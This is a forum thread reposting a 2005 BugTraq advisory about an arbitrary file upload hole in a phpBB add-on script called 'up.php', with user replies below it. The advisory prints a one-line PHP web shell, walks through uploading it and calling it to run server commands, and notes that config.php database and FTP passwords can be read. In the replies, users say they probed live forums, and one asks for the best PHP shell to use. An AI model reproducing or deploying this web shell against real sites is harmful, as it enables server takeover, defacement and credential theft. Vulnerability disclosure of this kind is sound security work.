Waraxe IT Security Portal

waraxe · Site admin

To: BugTraq
Subject: phpBB Upload Script "up.php" Arbitrary File Upload
Date: Apr 8 2005 2:21AM
Author: Status-x <phr4xz gmail com>
Message-ID: <81ceb96d050407192175d0e344@mail.gmail.com>

#####################################################################

Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"

$ Author: Status-x
$ Contact: phr4xz gmail com - status-x hackersoft net
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com

$ Affected Software: phpBB 2.0.x

Note: Sorry if it has been posted before

#####################################################################

-= Description =-

phpBB its a forums system written in php which can support images, polls,

private messages and more

http://www.phpbb.com

---------------------------------------------------------------------------

-= Vulnerabilities =-

- | "Arbitrary File Upload" |

In phpBB forums there is an script which can allow to remote and registered

users to upload files with arbitrary content and with any extension.

I didnt found any website where i can download the script so i couldnt

check who made it.

- | Examples: |

We can create and example code to upload it to the "test site"

<?

system($cmd)

?>

And save it as cmd.php. The we enter to:

--------------------------

http://target/phpbb/up.php

--------------------------

And upload our code, to see our file we just enter to:

-----------------------------------

http://targey/phpbb/uploads/cmd.php

-----------------------------------

And we could see that our file has been uploaded:

Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2

The we can execute *NIX commands to obtain extremely compromising info

that could end with the "deface" of the affected site:

-----------------------------------------------------

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)

------------------------------------------------------

This is just an example to what can be done by a malicious attacker.

- | "Password Disclosure" |

The remote or local attacker can also read the config.php file disclosing

the information about the DB and possible the FTP password

------------------------------------------------------

Example

-= How to FIX =-

Just filter the allowed extensions of the uploaded files in the up.php

source.

-= Contact =-

Status-x

phr4xz gmail com

http://www.defacers.com.mx

From url: http://www.securityfocus.com/archive/1/395351

y3dips · Valuable expert

strange

i dont find any file with name up.php and uploads directory even in 2.0.4 version of PHPbb

???????

waraxe · Site admin

shai-tan · Valuable expert

Yes its not on any of my older versions.

wyk · Regular user

i found a lot of forums containing the up.php, and the strangest is that the first i found allready contained cmd.php.....

shai-tan · Valuable expert

Yeah its strange looking at the older 2.0.x.

y3dips · Valuable expert

waraxe : hum, maybe yaou are right, the "up.php" maybe in another module Question

wyx : how a lucky guy you are Laughing

wyk · Regular user

y3dips: there was an error when i wanted to open it. did not try to put my own.
but there did not apear any exploit that would work on the forum that i wanted so much..

theOne · Regular user

instead of th system command, what's the best php shell script out there to use?

LINUX · Moderator

erg0t · Valuable expert

the up.php script is a hack, i don't remember well but i think i find in phpbbhacks